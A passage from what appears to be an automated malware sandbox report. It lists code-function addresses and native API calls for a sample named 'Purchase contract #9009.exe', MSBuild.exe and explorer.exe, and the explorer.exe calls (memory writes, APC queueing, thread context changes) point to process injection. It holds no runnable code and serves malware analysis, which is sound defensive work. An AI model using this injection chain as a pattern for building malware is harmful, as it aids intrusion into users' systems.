          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A770 NtOpenThread,9_2_04B3A770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39770 NtSetInformationFile,9_2_04B39770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39760 NtOpenProcess,9_2_04B39760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B398A0 NtWriteVirtualMemory,9_2_04B398A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B398F0 NtReadVirtualMemory,9_2_04B398F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39820 NtEnumerateKey,9_2_04B39820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3B040 NtSuspendThread,9_2_04B3B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B399D0 NtCreateProcessEx,9_2_04B399D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39950 NtQueueApcThread,9_2_04B39950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A80 NtOpenDirectoryObject,9_2_04B39A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A20 NtResumeThread,9_2_04B39A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A10 NtQuerySection,9_2_04B39A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A00 NtProtectVirtualMemory,9_2_04B39A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A3B0 NtGetContextThread,9_2_04B3A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39B00 NtSetValueKey,9_2_04B39B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB82F0 NtClose,9_2_02EB82F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB8270 NtReadFile,9_2_02EB8270
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB83A0 NtAllocateVirtualMemory,9_2_02EB83A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB81C0 NtCreateFile,9_2_02EB81C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB82EA NtClose,9_2_02EB82EA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB826C NtReadFile,9_2_02EB826C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB8215 NtCreateFile,9_2_02EB8215
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B6731_2_0010B673
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_00BDC27C1_2_00BDC27C
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_00BDEC581_2_00BDEC58
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_00BDEC481_2_00BDEC48
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046604F81_2_046604F8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046631C91_2_046631C9
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660B481_2_04660B48
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046604E81_2_046604E8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046616001_2_04661600
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04661C051_2_04661C05
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660EF11_2_04660EF1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660F001_2_04660F00
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046619F11_2_046619F1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660B391_2_04660B39
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04661BAF1_2_04661BAF
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B6C01_2_0010B6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B9094_2_0041B909
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408C604_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408C644_2_00408C64
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402D884_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041CE654_2_0041CE65
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AF9004_2_015AF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C41204_2_015C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167E8244_2_0167E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016610024_2_01661002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016728EC4_2_016728EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BB0904_2_015BB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016720A84_2_016720A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A04_2_015D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAB404_2_015CAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672B284_2_01672B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166DBD24_2_0166DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016603DA4_2_016603DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DEBB04_2_015DEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165FA2B4_2_0165FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016722AE4_2_016722AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671D554_2_01671D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672D074_2_01672D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A0D204_2_015A0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016725DD4_2_016725DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BD5E04_2_015BD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D25814_2_015D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166D4664_2_0166D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B841F4_2_015B841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671FF14_2_01671FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167DFCE4_2_0167DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C6E304_2_015C6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166D6164_2_0166D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672EF74_2_01672EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB44969_2_04BB4496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0841F9_2_04B0841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBD4669_2_04BBD466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B225819_2_04B22581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D829_2_04BB2D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0D5E09_2_04B0D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC25DD9_2_04BC25DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF0D209_2_04AF0D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2D079_2_04BC2D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC1D559_2_04BC1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2EF79_2_04BC2EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B16E309_2_04B16E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBD6169_2_04BBD616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC1FF1